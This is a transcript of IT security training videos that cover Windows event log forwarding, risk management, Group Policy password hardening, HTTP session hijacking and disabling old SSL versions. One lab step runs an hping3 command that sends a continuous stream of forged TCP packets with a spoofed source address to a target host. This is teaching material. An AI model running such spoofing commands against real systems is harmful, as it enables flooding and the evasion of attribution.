I'm going to go and right click on Computer from the start menu.
This is a Windows 7 station, and I'll choose Manage. [The Computer Management window opens.] I need to
get to my local groups. [Dan expands the Local Users and Groups node from the navigation pane and selects
the Groups folder.] So what I want to do is open up the Event Log Readers group. [The Event Log Readers
Properties window opens.] And make sure that the appropriate computer account that must have access to read
log entries on this host is listed. [He clicks the Add button at the bottom of the dialog box. The Select Users,
Computers, Service Accounts, or Groups dialog box opens. He clicks the Object Types button. The Object
Types dialog box opens, and he selects the Computers checkbox. He clicks Ok to close the Object Types dialog
box.] So here I'm just going to go ahead and put in the name of my server and verify the name, and I'll click
OK. [The dialog box closes. He closes the Computer Management window.] So the next thing to do is to
configure a subscription on the server itself. On the server, in the Event Viewer tool, [The screen switches to
the Event Viewer window.] we would right-click on Subscriptions in the left hand panel. And we would create
a new subscription. [The Subscription Properties dialog box opens.] When we do that, I'm going to call it
Sub1 for subscription one. It's going to be collector initiated, this server will collect log events that we specify,
but I have to select the computers here. [He clicks the Select Computers button. The Computers Dialog box
opens.] So I'm going to go ahead and add domain computers here. [He clicks the Add Domain Computers
button. The Select Computers dialog box opens.] So, here's one computer. [He adds the win7 computer and
clicks OK. The Select Computers dialog box closes.] I'll make sure that I've got the connectivity over WINRM
required. [He clicks the Test button in the Computers dialog box. The Event Viewer message box
opens.] Otherwise WINRM would have to be configured on the client device. [He closes the dialog boxes and
goes back to the Subscription Properties dialog box.] So, I'm going to go ahead now and click on the Select
Events [The Query Filter dialog box opens.] where I can choose for instance what I want to view. Now, in our
exercise instructions, we were asked to make sure that we have log forwarding to a centralized host; they didn't specify what event level. So here I'll just choose Critical, Error, and Warning, specifically let's say from
the Windows Application log, then I'll click OK. [He closes the dialog boxes and goes back to the Event
Viewer window.] Now the result is that those events should then show up here under Forwarded Events. So, I
have one centralized place to view events from other machines over the network.
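For reference, the plumbing behind a collector-initiated subscription can also be set up from an elevated prompt. This is only a minimal sketch; the domain and server names are the ones used in this demo environment and would differ in yours:

# On each source (client) computer: enable WinRM and let the collector's computer account read logs.
winrm quickconfig
net localgroup "Event Log Readers" 'FAKEDOMAIN1\SRV2016-1$' /add

# On the collector server: enable the Windows Event Collector service.
wecutil qc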
And we could repeat this in terms of configuring the Event Log Readers group which we did initially on other
computers. In the final part of the exercise we were asked to use Linux to create a forged TCP packet. [The
screen switches to root@kali:~ command prompt. It displays the following command: hping3 192.168.1.1 --
spoof 172.16.1.19 --destport 25.] Well, we can do that using Kali Linux with the built in hping3 command
where I'm going to target a host at 192.168.1.1. I'm using --spoof so I want to spoof the packet. It's going to
look like it came from 172.16.1.19, and I'm setting the destination port to 25 for SMTP mail. So as soon
as I press Enter I am continuously sending out that traffic to 192.168.1.1 where I've spoofed the contents of
that transmission. Hping3 has other parameters to further spoof other details.
Session & Risk Management
A structured approach to security allows for the efficient management of security controls. In this 13-video
course, you will explore assets, threats, vulnerabilities, risk management, user security and session
management, data confidentiality, and encryption. Key concepts covered in this course include how to identify,
assess, and prioritize risks; how to implement security controls to mitigate risk; and learning about account
management actions that secure the environment. Next, learn how to use Group Policy to implement user
account hardening and configure the appropriate password security settings for those accounts in accordance
with organizational security policies; learn how HTTP session management can affect security; and observe
how to harden web browsers and servers to use TLS (transport layer security). Then learn how centralized
mobile device control can secure the environment; learn encryption techniques used to protect data; and
observe how to configure a virtual private network (VPN) to protect data in motion. Finally, learn how to
configure and implement file encryption to protect data at rest; and how to configure encryption and session
management settings.
Table of Contents
Objectives
No Objective Provided
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993, including as a technical trainer with Global Knowledge, a programmer, and a consultant, as well as an IT tech author and editor for McGraw-Hill and Wiley Publishing. He has held and still holds IT certifications in Linux, Novell, Lotus, CompTIA, and Microsoft.
His specialties over the years have included networking, IT security, cloud solutions, Linux management and
configuration and troubleshooting across a wide array of Microsoft products. Most end users have a general
sense of IT security concepts, but today's IT systems are growing ever larger and more complex.
So now more than ever, it's imperative to have a clear understanding of what digital assets are and how to deal
with security threats and vulnerabilities. Users need to acquire the skills and knowledge to apply security
mitigations at the organizational level. In this course, Dan Lachance will explore how a structured approach to
security allows for the efficient management of security controls. Specifically, he'll cover risk management,
user and session management, and encryption.
Objectives
recognize digital assets that have value to the organization along with related threats
[Video description begins] Topic title: Asset, Threats, and Vulnerabilities. The presenter is Dan
Lachance. [Video description ends]
Today's IT systems are growing ever larger and more complex. And so it's important to protect digital assets.
IT security or cybersecurity is really based on the protection of assets. We want to protect against threats that
might render IT systems unusable. We want to protect against the theft of intellectual property or the theft of
Personally Identifiable Information (PII), which includes things like credit card numbers, street addresses,
mother's maiden name. We want to protect against the theft of Protected Health Information, PHI, which as the
term implies, is medically related information, medical insurance coverage, medical procedures performed,
and so on.
Digital assets have a perceived value to the organization. And it's critical that an up-to-date inventory of these
digital assets is maintained by the organization, because what might not have value at one point in time could have great value down the road at a different point in time. Digital assets can include things like IT systems, unique IT processes, programming code, and of course, data. This data, again, might not have a perceived value immediately, but could down the road. Gathering users' shopping habits, for example, might not have a lot of value in the first quarter that it's gathered.
But after a few years, we start to be able to perform a trend analysis to see what consumer shopping habits
really turn out to be. And so they can have value down the road, where it might not right now. IT
vulnerabilities are weaknesses, and often they are based on user error. User awareness and training is a great
defense against many security breaches, especially against social engineering or deceptive practices by
malicious users where they're trying to trick users into clicking a link or supplying sensitive information over
the phone, or opening a file attachment in an email.
We also have to consider vulnerabilities related to products that get shipped with default settings that aren't
secure. Things like home wireless routers are a great example where the default username and password might
be in place. And unless the user changes it, it's still in effect even when it's plugged in at a user's home. And as a
result, it doesn't take very much to determine what the default credentials are to hack into that type of a system.
Today there is a proliferation of Internet of Things or IoT devices, which essentially include pretty much anything that can connect to the Internet, such as home automation systems, baby monitors, smart cars, and so on.
The problem with a lot of these is that they're designed to be simple to use, and as a result, don't have a lot of
security built in. And in some cases, the firmware within these IoT devices isn't even updateable. Other
vulnerabilities can come in the form of configuration flaws. An example of this could be hosts or entire
networks that aren't hardened. Hardening means we're reducing the attack surface. In other words, we're trying
to lock down a system or a network environment, perhaps by patching it, by removing unnecessary services,
maybe by putting it on a protected network, and so on.
Examples of IT threats would include Denial of Service or DoS attacks, and its counterpart, Distributed Denial
of Service, or DDoS attacks, which includes a number of machines. It could be dozens, hundreds, or even
thousands under centralized control of a malicious user. The malicious user can then send instructions to that
collection of machines under his or her control, which is called a zombie net or a botnet. And then those bots,
or zombies can then go out and perhaps, flood a victim network with useless traffic.
And therefore, it's Denial of Service for legitimate users of that service. Other threats, of course include
malware, whether it's things like spyware or worms. There have been a lot of cases of ransomware over the last few years that encrypt sensitive data files. And if you don't provide a Bitcoin payment, you won't receive a decryption key. And often, there is no guarantee that you will receive the key anyway, even if you do submit this untraceable Bitcoin payment.
Other IT threats include data loss, whether it's intentional or unintentional, such as a user mistakenly sending a
sensitive email file attachment to people outside of the company. Then we have security controls that are put in
place to mitigate threats, but then over time, might not be as secure as they were initially. Now, examples of
security controls that can mitigate threats would include the encryption of data at rest using an encryption
solution, such as those built into operating systems like Microsoft BitLocker or Microsoft Encrypting File
System.
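As a concrete example of that last control, BitLocker can be enabled from PowerShell. A minimal sketch, assuming a TPM-equipped Windows machine and that C: is the volume to protect:

# Encrypt the volume and add a recovery password protector as a fallback unlock method.
Enable-BitLocker -MountPoint "C:" -EncryptionMethod XtsAes256 -UsedSpaceOnly -RecoveryPasswordProtector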
[Video description begins] Topic title: Risk Management. The presenter is Dan Lachance. [Video description
ends]
Risk management is an important part of cybersecurity. It relates to the protection of digital assets like IT
systems, and the data that they produce and process. Any business endeavor will always have some kind of
potential threats. The key is to properly manage the risk against those digital assets. So, we have to have
acceptable security controls in place to protect assets, at a reasonable cost. Risk management first begins with
the identification of both on-premises and cloud assets. This would include things like personnel. Nothing is
more important than people.
Followed by things like business processes that might be unique within the industry. IT systems and data. We
also have to consider data privacy laws and regulations that might need to be complied with, in the protection
of these IT systems and data. Next we need to identify threats against the assets. So threats against personnel
safety, or data theft, or systems being brought down. So that would result in system down time which certainly
has a cost associated with it. We then need to determine the likelihood that these threats would actually occur,
so we need to prioritize the threats.
This way, we are focusing our energy and our resources on what is most likely to happen, which makes sense.
So what are some examples of potential threats? Well, any threat that is going to have a negative business
impact, such as an e-commerce web site being down for a number of hours. Which means that we can't sell our
products or services if that site is down. When we say that site, we're normally referring to a farm of servers
sitting behind a load balancer in most cases. We might also experience a power outage. That is also another
type of threat, or a hardware failure.
There could be a software failure within the operating system. Or a driver within the operating system can
cause a failure or a malfunction of some kind. Of course, we also have to consider malware infections as a
realistic threat. Or the system being compromised by a malicious user, which then means they could steal data.
Or they might use it for Bitcoin mining, which would slow down our system. Of course, there are always
natural disasters, like floods or fires or bad weather that can cause problems and result in downtime. Of course,
there are then man-made disasters such as arson, fires set on purpose, or terrorist attacks or anything of that
nature.
So the next thing is to prioritize the risks and categorize them via a risk registry, which is essentially a
centralized document that will show all of the risks, and how they are categorized or prioritized. So we might
determine then that software failure is the most likely threat, followed by hardware failure, maybe followed by
power outages, malware infections, natural disasters, and finally man-made disasters. This could be based on
regional history where our premises are located, as well as past incidents that might have occurred in our
environment.
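A risk registry doesn't have to be elaborate; even a short script can capture and prioritize entries like the ones just described. A minimal PowerShell sketch with made-up likelihood and impact scores:

# Hypothetical risk registry entries, scored 1 (low) to 5 (high).
$risks = @(
    [pscustomobject]@{ Risk = 'Software failure';  Likelihood = 4; Impact = 3 }
    [pscustomobject]@{ Risk = 'Hardware failure';  Likelihood = 3; Impact = 3 }
    [pscustomobject]@{ Risk = 'Power outage';      Likelihood = 2; Impact = 4 }
    [pscustomobject]@{ Risk = 'Malware infection'; Likelihood = 2; Impact = 5 }
)

# Prioritize by a simple likelihood times impact score.
$risks | Select-Object *, @{ Name = 'Score'; Expression = { $_.Likelihood * $_.Impact } } |
    Sort-Object Score -Descending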
The next thing to consider is to implement cost-effective security controls. A security control is put in place to
reduce the impact of a threat. And we have to make sure that the risk is accepted in order for this to happen in
the first place. If we choose not to engage in a specific activity because it's too risky, well then, if we're not
engaging in that activity, there is no need to implement a security control. We always have to think about legal
and regulatory compliance regarding security controls.
For example, if we're in the retail business dealing with credit cards and debit cards, then the PCI DSS standard applies, which affects merchants dealing with cardholder data. We would have to take a look at how we
would protect assets such as customer card information, whether we encrypt network traffic or encrypt data at
rest. And often a lot of these standards will state that data must be protected, but won't specify exactly what
should be used to do it.
Often, that is left up to the implementers. It's important to always monitor the effectiveness of implemented
security controls via periodic security control reviews. Just like digital assets over time can increase in value,
in the same way our implemented security controls can be reduced in terms of their effectiveness at mitigating
a threat. So it's always important to monitor these things over time.
Objectives
[Video description begins] Topic title: Map Risks to Risk Treatments. The presenter is Dan Lachance. [Video
description ends]
Securing IT resources means proper risk management. Proper risk management means mapping risks to risk
treatments. Risk treatments include things like risk acceptance, risk avoidance, risk transfer, and risk
mitigation. We're going to talk about each of these. We're going to start with risk acceptance. With risk
acceptance, we are not implementing any type of specific security control to mitigate the risk, because the likelihood of the realization of that threat is so low that it doesn't require it. And should that threat materialize,
the negative impact to the business might also be very low.
And so we accept the risk as it is in engaging in that particular activity. Some potential examples of this
include the hiring of new employees. Now performing our due diligence with background checks before hiring
might be considered a separate activity from the actual hiring itself, which is why hiring new employees
might not require any types of security controls. Company mergers and acquisitions can also fall under this
umbrella. Under the presumption that organizations have already done their due diligence to manage risk
appropriately in their own environments. Using software that is known to have unpatched vulnerabilities, yet
we still choose to use that software in an unpatched state.
Well, we might do that because the possibility of that threat being realized is so low. Risk avoidance is related
to risks that introduce way too high of a possibility of occurrence beyond the organization's appetite for risk.
So what we're doing with risk avoidance then is we are removing the risk, because we are not engaging in the
activity that introduces that high level of risk. As an example, we might stop using a currently deployed
operating system, such as Windows XP, because there are too many vulnerabilities now. Maybe there weren't
initially, but there are now.
And so we're going to upgrade to a newer secure version. Now, in one aspect, we are avoiding the risk because
we are no longer using Windows XP. But at the same time, you could argue that we might be mitigating the
risk by upgrading to a new version of Windows, such as Windows 10. So it really depends on your
perspective. Risk transfer essentially means that we are outsourcing responsibility to a third party. An example of this these days is cyber liability insurance related to security breaches, where the monthly
premiums can actually be reduced if you can demonstrate that you've got deployed security controls that are
effective in mitigating risks.
It can relate to online financial transactions, customer data storage, medical patient data storage. Also, if we
decide to outsource some on-premises IT solutions to the public cloud, to a degree, there is risk transfer.
Because we have service level agreements or SLA contracts with cloud providers that guarantee specific levels
of uptime for the use of some different cloud services. Bear in mind that the variety of cloud services available
out there is large and each one of them has a different SLA or service level agreement.
Risk mitigation means that we are applying a security control to reduce the impact if the risk is realized. An
example of this would be firewall rules that block all incoming connections initiated from the Internet. And
this might be required by organizational security policies, by laws, and by regulations. So it's important, then,
that we apply the appropriate risk treatment, given that we have an understanding of the risk associated with
engaging in specific activities.
Objectives
User account management is a crucial part of cybersecurity. It's important that it should be done correctly
because if user accounts are not managed correctly, if they're not secured properly, malicious users could gain
access to user accounts, which could ultimately lead to the compromise of a sensitive system and its data.
User accounts can be managed manually. Usually this is in the form of a GUI, a graphical user interface where
administrators can click and drag and work with user accounts. You might imagine doing this in a Microsoft
Active Directory environment using the Microsoft Active Directory Users and Computers GUI tool. But user
account management can also be automated. For example, technicians might build a Microsoft PowerShell
script to check for users that haven't logged on for more than 90 days. Or, in a UNIX or Linux environment, a
Shell script might be written.
The UNIX or Linux shell script, for instance, might look for user accounts that have read and write permissions to the file system. We can also have
centralized management solutions in an enterprise that can be used to push out settings related to user
accounts. Especially those related to password strength. It's important that every user have their own unique
user account and that we don't have any shared logins. This way we have accountability when we start auditing
usage. If we audit usage of a shared account and we realize that in the middle of the night, Saturday night,
someone is doing something they shouldn't be doing to a database, we have no way of really knowing who it
is, if that account is a shared account.
So keep unique user accounts in place. Also we want to make sure we adhere to the principle of least privilege.
This is easier said than done because it's very inconvenient, as is usually the case with anything that means
better security. What this means is that we want to grant only the permissions that are required to perform a
task, whether it's to a user, to a group, to a service account. Now this requires more effort because we might
have to give specific privileges to other specific resources for that account, so it takes more time.
But the last thing you want to do for example in a Windows environment is simply add a user to the
administrator's group on a local Windows machine, just to make sure they have rights to do whatever they
need to do. Not a great idea. The next thing would be password settings, which we mentioned could be
managed centrally. Such as through tools like Microsoft Group Policy where we can set a minimum password
length, password expiration dates, whether or not passwords can be reused.
Multifactor authentication is crucial when it comes to user account management. The standard username and password both constitute something you know; even though there are two items, that is still single-factor authentication. Multifactor authentication uses authentication from different categories, like something you
know and something you have. And a great example of this, and it's prevalent out there often, for example
when you sign into a Google account, you'll have to know a username and a password and then Google will
send an authentication code to your smartphone.
And so, you then have to specify that code as well. You have to have that smartphone as well as knowledge of
the username and password to be able to sign in successfully. User accounts should also have expiry dates when
applicable. An example of this would be hiring co-op students that are finishing their studies and need some
work-term experience. So we might want to set an expiry on those accounts where we know that they have a
limited lifetime. It's important to audit, not only user account usage but also the file system, networks, servers,
access to data such as in databases.
All of this can be tied back to user accounts. But what we want to make sure we do is be selective in which users we choose to audit and which actions for each user. Because otherwise it
could result in audit alert message fatigue, if you're always getting audit messages about someone opening a
file. Maybe that is not relevant. So we need to think carefully about how to configure our auditing as it relates
to users.
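Coming back to the expiry-date point for accounts with a known limited lifetime, such as co-op students, here is a minimal PowerShell sketch, assuming an Active Directory environment; the user name and date are hypothetical:

# Expire a co-op student's account at the end of their work term.
Set-ADAccountExpiration -Identity "coop.student1" -DateTime "2025-08-31"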
Objectives
[Video description begins] Topic title: Deploy User Account Security Settings. The presenter is Dan
Lachance. [Video description ends]
One way to harden user accounts is to configure the appropriate password security settings for those accounts
in accordance with organizational security policies. If you're a Microsoft shop, you might use a Microsoft
Active Directory Domain that computers are joined to so they can pull down central settings from Group
Policy, such as security settings. That is exactly what I'm going to do here in Windows Server 2016.
Let me go over to my Start menu and fire up the Group Policy Management tool. Now this is a tool that can
also be installed on workstations. You don't have to do it on the server, but it will be present automatically on
servers that are configured as Microsoft Active Directory Domain controllers. When I fire up Group Policy, I
get to specify the Group Policy Object or the GPO in which I want to configure the settings.
[Video description begins] The Group Policy Management window opens. The window is divided into three
parts. The first part is the toolbar. The second part is the navigation pane. It contains the Group Policy
Management root node which contains the Forest: fakedomain1.local node, which further contains Domains
and Sites subnodes, Group Policy Modeling and Group Policy Results options. The Domains subnode includes
fakedomain1.local, Admins, and Domain Controllers subnodes. The fakedomain1.local subnode is expanded
and it contains the Default Domain Policy option. The Default Domain Policy option is selected and open in
the third part. It contains four tabs: Scope, Details, Settings, and Delegation. The Scope tab is selected. It is
further divided into three sections. The first section is Links, which contains the Display links in this location
drop-down list box and a table with Location, Enforced, Link Enabled, and Path column headers and one row.
The values fakedomain1.local, No, Yes, and fakedomain1.local are displayed under the Location, Enforced,
Link Enabled, and Path column headers, respectively. The second section is Security Filtering. It includes a
table with Name column header and one row, with the value Authenticated Users. It also includes three
buttons: Add, Remove, and Properties. The third section is WMI Filtering. It contains a drop down list box
and Open button. [Video description ends]
Every Active Directory Domain has what is called a Default Domain Policy.
[Video description begins] He points to the Default Domain Policy option. [Video description ends]
That is a GPO, a Group Policy Object, and notice that hierarchically, it's indented directly under my Active
Directory Domain.
[Video description begins] He points to the fakedomain1.local subnode. [Video description ends]
So therefore, the settings in this Default Domain Policy will apply to all users and computers in the entire
Active Directory Domain by default, unless it's configured otherwise, but that is the default behavior. So if
you're going to configure password settings in Active Directory using Group Policy, you have to configure
them in the Default Domain Policy.
For other GPOs that you might link with specific organizational units that contain users and computers, like Chicago or Boston or LasVegas, you can configure other settings that apply to just those hierarchical levels of AD, Active Directory, but password settings won't work.
[Video description begins] He points to these options under the fakedomain1.local subnode. [Video
description ends]
You've got to do it in the Default Domain Policy because, well, that is just the way it is. So I'm going to go
ahead and right-click on the Default Domain Policy and choose Edit. You'll find that the bulk of security
settings are not at the User Configuration level but rather at the Computer Configuration level. So under
Computer Configuration, I'm going to drill down under Policies, and then I'm going to go down under
Windows Settings.
[Video description begins] The Group Policy Management Editor window opens. It is divided into three parts.
The first part is the toolbar. The second part is the navigation pane. It contains the Default Domain Policy
[SRV2016- 1.FAKEDOMAIN1.LOCAL] Policy root node which contains two nodes, Computer Configuration
and User Configuration. The Computer Configuration node contains the Policies and Preferences subnodes.
The User Configuration node contains the Policies and Preferences subnodes. The third part contains two
tabs, Extended and Standard. [Video description ends]
After that opens up, I'll then be able to drill down and see all of the security settings that are configurable.
[Video description begins] The Windows Settings subnode includes the Name Resolution Policy, Deployed
Printers, and Security Settings subnodes. [Video description ends]
So I'll expand Security Settings and we'll see all kinds of great stuff here including Account Policies. So I’ll
drill down under that, and I'm going to click on the Password Policy.
[Video description begins] The Security Settings subnode includes the Account Policies, Local Policies, and
Event Log subnodes. He expands the Account Policies subnode and it contains Password Policy, Account
Lockout Policy, and Kerberos Policy subnodes. He clicks the Password Policy subnode and a table is
displayed in the third part of the window. The table contains two columns and six rows. The column headers
are Policy and Policy Setting. The Policy column header includes the Enforce password history, Minimum
password age, and Minimum password length values. [Video description ends]
Over on the right, I can determine the password settings I want applied at this domain level which will apply to
all the users and computers in the domain by default. Now it might take an hour and a half, two hours, three
hours depending on your environment and how it's set up.
It's not going to be immediate once you configure it, but these settings will be put into effect. So what I'm
going to do here, is start with the Minimum password length, which is currently set at 0 characters, that is
terrible. So I'm going to go ahead and double-click on that, and I'm going to say that it needs to be a minimum
of 16 or 14 characters.
[Video description begins] The Minimum password length Properties dialog box opens. It contains two tabs:
Security Policy Setting and Explain. The Security Policy Setting tab is selected. It includes a Define this policy
setting checkbox and No password required spin box. It also includes OK, Cancel, and Apply buttons. The
Define this policy setting checkbox is selected. [Video description ends]
[Video description begins] He enters the value 14 in the No password required spin box. The name of the spin
box changes from No password required to Password must be at least. [Video description ends]
Now depending on add-on extensions you might have installed, other additional products besides just what you
get with Active Directory, you'll have different settings that you can apply here. So here, I'm going to have to
be happy with 14 character passwords. Your users won't be happy, but that doesn't matter, the environment
will be more secure.
[Video description begins] He clicks the OK button and the Minimum password length Properties dialog box
closes. [Video description ends]
The next thing I can do is turn on password complexity. Now, that is already turned on, which means we
don't want to allow simple passwords to be used.
[Video description begins] He double-clicks the Password must meet complexity requirements value and the
Password must meet complexity requirements Properties dialog box opens. It contains two tabs: Security
Policy Setting and Explain. The Security Policy Setting tab is selected. It contains Define this policy setting
checkbox and two radio buttons, Enabled and Disabled. Define this policy setting checkbox and Enabled radio
button are selected. [Video description ends]
In other words, we want to be able to use a mixture of upper and lowercase letters and symbols and so on.
When you're configuring Group Policy, notice that you'll always have an Explain tab at the top so you can see
what that specific setting will do. And here we see what the password complexity settings entail. So we've got
that setting, that is fine, it was already done.
[Video description begins] He clicks the OK button and the Password must meet complexity requirements
Properties dialog box closes. [Video description ends]
[Video description begins] He double-clicks the Minimum password age value and the Minimum password
age Properties dialog box opens. It includes a Define this policy setting checkbox and Password can be
changed immediately spin box. It also includes OK, Cancel, and Apply buttons. The Define this policy setting
checkbox is selected. [Video description ends]
Next, I'll set a Minimum password age, because as soon as a user is forced to change a password, I don't want them to go and change it right away to
something else that they know that is easier to use.
[Video description begins] He enters the value 5 in the Password can be changed immediately spin box and
the name of the spin box changes to Password can be changed after:. [Video description ends]
I'm also going to set a Maximum password age in accordance with organizational security policies.
[Video description begins] He clicks the OK button and the Minimum password age Properties dialog box
closes. He double-clicks the Maximum password age value and the Maximum password age Properties dialog
box opens. It includes a Define this policy setting checkbox and Password will not expire spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is selected. [Video
description ends]
[Video description begins] He enters the value 30 in the Password will not expire spin box and the name of the
spin box changes to Password will expire in. He clicks the OK button and the Maximum password age
Properties dialog box closes. [Video description ends]
I can also Enforce password history so people can't keep reusing the same passwords. Maybe it will remember
the last eight passwords.
[Video description begins] He double-clicks the Enforce password history value and the Enforce password
history Properties dialog box opens. It includes a Define this policy setting checkbox and Do not keep
password history spin box. It also includes OK, Cancel, and Apply buttons. The Define this policy setting
checkbox is selected. He enters the value 8 in the Keep password history spin box and the name changes to
Keep password history for:. He clicks the OK button and the dialog box closes. [Video description ends]
So all of these settings are now saved into Group Policy within the Default Domain Policy. So what this means
is as machines refresh Group Policy, which they do automatically by default, approximately every 60 to 90
minutes, then they will see this change, and it will be put into effect.
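In many environments the same default domain password policy can also be adjusted from PowerShell rather than the Group Policy GUI. A minimal sketch mirroring the values configured above, assuming the ActiveDirectory module and sufficient privileges:

# Apply the password settings from the demo to the default domain password policy.
Set-ADDefaultDomainPasswordPolicy -Identity fakedomain1.local `
    -MinPasswordLength 14 -ComplexityEnabled $true `
    -MinPasswordAge "5.00:00:00" -MaxPasswordAge "30.00:00:00" `
    -PasswordHistoryCount 8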
Objectives
[Video description begins] Topic title: HTTP Session Management. The presenter is Dan Lachance. [Video
description ends]
HTTP stands for HyperText Transfer Protocol. It's the protocol that is used between a web browser and a web
server as they communicate back and forth. The secured version of it is HTTPS, which can use SSL or ideally
TLS, Transport Layer Security, to secure that communication. HTTP/1.0 is considered stateless. What this
means is that, after the web browser makes a request to the web server and the web server services it, the
communication stops, the session isn't retained.
[Video description begins] Communication stops upon HTTP transaction completion. [Video description ends]
And so the way that we get around this is by using web browser cookies. These are small files on the client
web browser machine that can retain information: preferences for a user for a web site, things like the preferred language, but also session state information between invocations of HTTP requests. So it might have a session
ID that is encrypted after the user successfully authenticates to a secured web site.
And that would be in the form of a security token; that cookie data, such as the token, can then be
submitted to web servers for future transactions. Now, there is usually a timeout involved with this, and you
might be familiar with this if you've ever conducted online banking. After you authenticate to online banking,
for a few minutes you can continue doing your online banking without having to reauthenticate. But if you step
away from your station for a few minutes and don't log out, when you come back you'll have to reauthenticate.
So usually this cookie data has a specific lifetime.
HTTP/1.1 and HTTP/2 support what are called persistent HTTP connections. They're also called HTTP TCP
connection reuse or HTTP keep-alive, which in HTTP/1.0 had to be enabled through an HTTP header. All of
this really means the same thing: instead of having a single connection between a web browser and a web
server that terminates after the server services the request, the connection isn't treated as brand new every time
the web browser sends a request to the server.
Session management can also be done programmatically. Developers can use language- and platform-specific
APIs, for example in Tomcat Java servlets, to enable HTTP session management. What we're really doing is
taking a bunch of network communications between the browser and the server and treating them as the same
session. This can be done using HTTP session IDs, and again, this is what you'll often see cookies used for on
secured web sites.
So this way, it allows the web server to track sessions from the client across multiple HTTP requests. Because
as we know, generally speaking, certainly in the case of HTTP/1.0, it is considered stateless or connectionless.
So the session ID, where could this be stored? Well, it could actually be stored in a form field on a web form.
It might even be a hidden field. Often it's stored in a cookie. It could also be embedded within a URL, and
when it is, that is called URL rewriting.
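As a rough client-side illustration, assuming the third-party Python requests library is installed and that the example.com URLs are placeholder endpoints, a Session object both reuses the underlying TCP connection and automatically resends whatever session cookie the server issued:

import requests

with requests.Session() as s:
    # Authenticate once; the server's Set-Cookie response (the session ID) is stored in s.cookies.
    s.post("https://example.com/login", data={"user": "u1", "password": "..."})
    # Follow-up requests reuse the connection and send the session cookie automatically.
    r = s.get("https://example.com/account")
    print(r.status_code, s.cookies.get_dict())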
HTTP session IDs must not be predictable in order for their use to be considered secure. They shouldn't be
sequential, and they shouldn't be derivable from some kind of mathematical formula that predicts the next
value to be used for a session ID. Now, remember how session IDs are used: after a user has successfully
authenticated to a site or web application, the client sends the session ID with future requests during that
session to identify its authenticated state, so that the server knows it's authorized to do things. The server can
then maintain session information for that specific ID. The other consideration to watch out for is HTTP
session hijacking, also called cookie hijacking.
What happens is attackers can take over an established, active HTTP session. They need the session ID, which
could be stored in a cookie. So imagine that somehow we manage to trick a user into clicking a link on a
malicious web site that executes some JavaScript on the client machine in the web browser. Now, when
JavaScript executes in a web browser, it is limited in terms of what it can do. But one of the things it will be
able to do is to take a look at any cookies and send them along to a server.
So if a user's browser session is compromised and they've already got an authenticated connection, then there
is a possibility that tampering could take place where that session ID is replayed or sent out to perform
malicious acts, such as depositing money into an anonymous account that the attacker has access to, or sending
it through Bitcoin over the Internet. So as we know, session IDs should never be predictable; otherwise, they
are really susceptible to session hijacking. So how could this session hijacking occur?
We've already identified that it could be client-side malicious web browser scripts that the user is somehow
tricked into executing, such as by visiting a web site that has some malicious JavaScript on it. It could also be
malware that runs within the operating system, which might not be sandboxed to just the web browser session
itself.
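Part of the defense is making sure session IDs can't be guessed in the first place. Here is a minimal Python sketch contrasting a predictable, sequential ID with a cryptographically random one generated by the standard secrets module:

import secrets

next_id = 1000

def predictable_session_id() -> str:
    # Sequential IDs like this are trivial for an attacker to guess.
    global next_id
    next_id += 1
    return str(next_id)

def random_session_id() -> str:
    # 32 random bytes, URL-safe encoded; infeasible to predict or brute force.
    return secrets.token_urlsafe(32)

print(predictable_session_id())
print(random_session_id())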
Another aspect of HTTP session management is to disable SSL, Secure Sockets Layer, on clients and on
servers.
[Video description begins] Disable SSL on Clients and Servers. [Video description ends]
In the screenshot, in the Windows environment, we've got some advanced Internet settings where we have the
option of making sure that SSL, or Secure Sockets Layer, is not enabled, which is the case here in the
screenshot.
[Video description begins] A screenshot of Internet Properties dialog box is displayed. It includes the General,
Security, Content, and Advanced tabs. The Advanced tab is selected. It consists of the Settings section and the
Restore advanced settings button. The Settings section includes the Use SSL 3.0, Use TLS 1.0, Use TLS 1.1,
and Use TLS 1.2 checkboxes. The Use TLS 1.0, Use TLS 1.1, and Use TLS 1.2 checkboxes are selected. [Video
description ends]
Even SSL version 3, the last version of SSL, is not considered secure. There are known vulnerabilities, and it's
really a deprecated protocol. So we should be using, where possible, the newest version of TLS, Transport
Layer Security, which supersedes SSL. There are even vulnerabilities with TLS 1.0, so even it shouldn't be
used. But remember, here we're seeing settings on the client side; the server side also needs to be configured
for it. Now, you might wonder, why is there any SSL 3.0 or TLS 1.0 still out there? Backwards compatibility
with older browsers or older software, but ideally, SSL should not be used at all in this day and age.
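For a sense of what those checkboxes correspond to in code, here is a minimal Python sketch, using the standard ssl module, of a client that refuses SSL 3.0, TLS 1.0, and TLS 1.1. The host name is a placeholder:

import socket
import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.minimum_version = ssl.TLSVersion.TLSv1_2   # nothing older than TLS 1.2 is negotiated
context.load_default_certs()

host = "example.com"  # illustrative host name
with socket.create_connection((host, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=host) as tls:
        print("Negotiated protocol:", tls.version())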
Objectives
In this demonstration, I'll be configuring SSL and TLS settings. SSL and TLS are protocols that are used to
secure a connection given a PKI certificate. So there is really no such thing as an SSL certificate or a TLS
certificate, even though people call it that. A given certificate doesn't dictate whether SSL or TLS must be used
with it, so the same certificate can be used for either or both. So let's start here on a Microsoft IIS web server.
The first thing I'm going to do on my server is go into the registry editor. So I'm going to start regedit.
[Video description begins] The Registry Editor window opens. It is divided into two parts. The first part is the
navigation pane and the second part is the content pane. The navigation pane contains the Computer root
node which includes HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, and HKEY_LOCAL_MACHINE
nodes. The HKEY_LOCAL_MACHINE node is expanded and it includes HARDWARE, SECURITY, and
SYSTEM subnodes. The SYSTEM subnode is expanded and it includes ActivationBroker and
CurrentControlSet subnodes. The CurrentControlSet subnode is expanded and it includes Control subnode.
The Control subnode is expanded and it includes SecurityProviders subnode. The SecurityProviders subnode
is expanded and it includes SaslProfiles and SCHANNEL subnodes. The SCHANNEL subnode is expanded
and it includes Ciphers and Protocols subnodes. The Protocols subnode is expanded and it contains SSL 2.0
subnode. The SSL 2.0 subnode further contains Client subnode. The second part contains a table with Name,
Type, and Data column headers. [Video description ends]
[Video description begins] He points to the Protocols subnode. [Video description ends]
Disabling old SSL versions is definitely something that we want to be able to do here. SSL 3 has a lot of known
vulnerabilities, and as such, it's considered deprecated. So we really should be disabling it on the server. So to
do that, here under
